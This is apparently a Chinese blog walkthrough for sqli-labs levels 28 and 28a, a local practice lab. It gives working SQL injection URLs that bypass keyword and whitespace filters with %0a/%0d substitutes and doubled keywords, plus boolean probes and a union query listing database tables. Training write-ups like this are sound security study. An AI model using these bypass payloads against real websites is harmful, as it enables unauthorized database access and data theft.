sqli-labs(28-28a)
Less-28
1.测试http://127.0.0.1/sqli-labs/Less-28/?id=1%27
,页面回显不正常,但又没有错误提示,报错注入没戏,尝试闭合语句,加单引号回显不正常,说明sql
语句闭合至少有'
,可能有)
,判断有无)
在Less-26已经写过,经过验证确实含有'
。
2.尝试使用联合查询注入,构造语句http://127.0.0.1/sqli-labs/Less-28/?id=1%27);union%20select%00
,看回显
空格没有了,说明空格被过滤了,尝试使用特殊字符绕过过滤,经测试如下特殊字符可以替换空格
%0a,%0d,%20,%0b,/%0a/
,再来构造http://127.0.0.1/sqli-labs/Less-28/?id=1%27);union%0dselect%0d1,2,3;%00
,看回显
,由前后两次构造的语句和回显提示,说明过滤了
union+空格(包括可替代空格的特殊字符)+select
,但是又没过滤单独存在的union
,select
,尝试构造http://127.0.0.1/sqli-labs/Less-28/?id=0')union%0dunion%0dselectselect%0d1,2,3
看是否能回显正常,测试后,结果,联合查询注入存在,查询方法前面已有,搞定。
3.再来看看有没有布尔型注入,构造http://127.0.0.1/sqli-labs/Less-28/?id=1%27)and%271%27=%272%27;%00
,http://127.0.0.1/sqli-labs/Less-28/?id=1%27)and%271%27=%271%27;%00
后一个回显正常,说明存在布尔型注入,脚本在Less-26已经有了,稍微改一下就好了。
Less-28a
过滤很严格,但是还是存在绕过滴,比如http://127.0.0.1/sqli-labs/Less-28a/?id=0%27)union%0Aseunion%0Aselselectectlect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema=%27security%27;%00
,存在联合查询注入,搞定
同样也可以使用脚本进行注入。
sqli-labs(28-28a)相关推荐
- SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注
第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...
- SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...
- SQLi LABS Less 26a 联合注入+布尔盲注
第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...
- SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
- sqli——labs初学者通关详
目录 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) Less-2 GET-Error based- Intiger bas ...
- SQLi LABS Less-8 布尔盲注
「作者主页」:士别三日wyx 「作者简介」:CSDN top200.阿里云博客专家.华为云享专家.网络安全领域优质创作者 第八关是单引号字符型注入,推荐使用布尔盲注 方式一:布尔盲注 第一步.判断注入 ...
- SQLi LABS Less-31
第31关的源码中并未对参数做过多的过滤,只是在参数两边拼接了双引号和括号 在url地址栏中输入 1") and true-- a,使SQL恒成立,页面正常显示 再输入 1") an ...
- SQLi LABS Less-30
第30关使用GET请求传递参数,在url中构造payload即可 后端源码中并没有做什么过滤,只是在参数两边添加了双引号 输入 1" and true-- a,页面正常显示 输入 1&quo ...
- SQLi LABS Less-29
第29关使用GET请求提交参数,在url中构造payload即可 源码中并没有做什么过滤,直接测试注入点即可 在url中输入 1'and true-- a,源码中的SQL会拼接成下面这样 注释后面的内 ...
- SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注
第26关是单引号字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录 一.功能分析 二 ...
最新文章
- Linux UserSpace Back-Door、Rootkit SSH/PAM Backdoor Attack And Defensive Tchnology
- 一线大厂的分布式唯一ID生成方案是什么样的?
- 解决Ubuntu中无法连接wifi的方法
- CodeFirst 的编程方式
- 公共的service接口
- VMware——虚拟机的安装
- 力扣347. 前 K 个高频元素(JavaScript,堆)
- uni-app 2.2 发布,大幅度优化 H5 端性能体验 | 技术头条
- 没有下班时间的上班怎么办?
- CCF201812-5 管道清洁【最小费可行流】(100分题解链接)
- 离阿里最近的机会,来了!
- oracle触发器无效且未通过重新验证_更改过程或触发器中的SET选项将导致重新编译...
- 深度学习之LSTM完全图解
- 前段时间的学习小结——体脂率的计算
- 软件工程_三层架构介绍
- 面试时候被问到为什么离职 离职原因 该如何回答?
- linux分段内存管理中的GDT,LDT,GDTR,LDTR
- [机缘参悟-66]:怎样才能让别人愿意帮你:利益共享法则、“大道”、“人性”
- [生存志] 第102节 屈原既放赋离骚
- tkinter style样式使用